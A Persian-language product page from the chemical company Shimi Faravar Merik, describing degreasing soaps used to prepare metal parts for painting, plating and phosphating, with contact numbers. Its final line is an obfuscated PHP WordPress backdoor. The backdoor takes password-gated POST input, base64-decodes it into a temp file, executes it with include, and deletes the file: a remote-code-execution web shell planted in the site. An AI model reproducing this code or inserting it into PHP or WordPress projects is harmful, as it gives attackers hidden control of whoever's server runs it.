کلمه کلیدی خود را وارد کنید

به ما پیام ارسال کنید

برای دریافت خبرهای جدید آدرس ایمیل خود را در کادر زیر وارد کنید.

مشخصات صابون اسید چربی گیر

مشخصات صابون اسید چربی گیر

در آیریک
portfolio
سرمایه گذار نام و نام خانوادگی:
تاریخ انتشار:
1970-01-01
محل سکونت:
ارزش:
معماری:
در مورد پروژه

مشخصات صابون اسید چربی گیر(Degreaser ) شرکت شیمی فرآور مریک

  • لزوم استفاده از مواد چربی گیری :

عموماً برای تولید یک قطعه صنعتی و فلزی پس از انجام یک سری ماشین کاری ، پرسکاری و عملیات مختلف بر روی فلزات و قرار داشتن در محیط های کارگاهی و عملیاتی لایه های چربی و انواع آلودگی های سطحی بر روی قطعات قرار می گیرد که لازم می گردد جهت آماده سازی و عملیات نهائی و حتی بسته بندی نهائی و ورود قطعه به بازار هدف یک سری تمیز کاری نهائی ( Finishing ) بر روی قطعات صنعتی انجام بگیرد که این آماده سازی نهائی شامل رنگ کاری ( الکترواستاتیک ، کوره ای ) ، انواع آبکاری و پوشش ها و .. می باشد که چربی گیری باعث ایجاد پوشش بادوام و بهتر بر روی قطعات می گردد و در بسیاری از موارد باعث صرفه جوئی در مصرف مواد و رنگ آبکاری می شود چون پوشش بر روی سطح عاری از چربی به مراتب مصرف کمتر مواد پوششی را به دنبال خواهد داشت و در تست سالت اسپری پوشش های رنگ و آبکاری زمان بسیاز زیادی در این تست مقاومت خواهند کرد و پوشش از روی فلزاتی که چربیگیری شده باشند و عملیات فسفاته کاری بر روی آنها انجام شده باشد به سختی پوسته خواهد شد و دوام بسیار زیادی خواهد داشت .

  • چربی گیر گرم :

اين چربي گير محلولی است با بوي ملايم كه براي برطرف كردن چربي و واكس از سطح اشياء آهني بكار مي‌رود . اين چربي‌گير بجاي تركيبات آلي نظير بنزن، پركلرواتيلين كه غالباً آتش زا ، بسیار سمی و يا گران مي‌باشند مورد استفاده قرار مي گيرد . چربی گیر فوق يك پاك كننده قوي و بي خطر بوده كه براي فلزات قبل از گالوانیزاسیون ، آبكاري ، رنگ کاری ، فسفاته کاری و یا لعاب مي تواند مورد استفاده قرار گيرد.

 

 

در نهایت کارشناسان و متخصصین شرکت شیمی فرآور مریک همواره آماده پاسخگویی به سوالات ، رفع اشکالات و شنیدن انتقادات و پیشنهادات شما مشتریان محترم می باشند.

 

تلفن تماس:

09128402813-02188559132

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}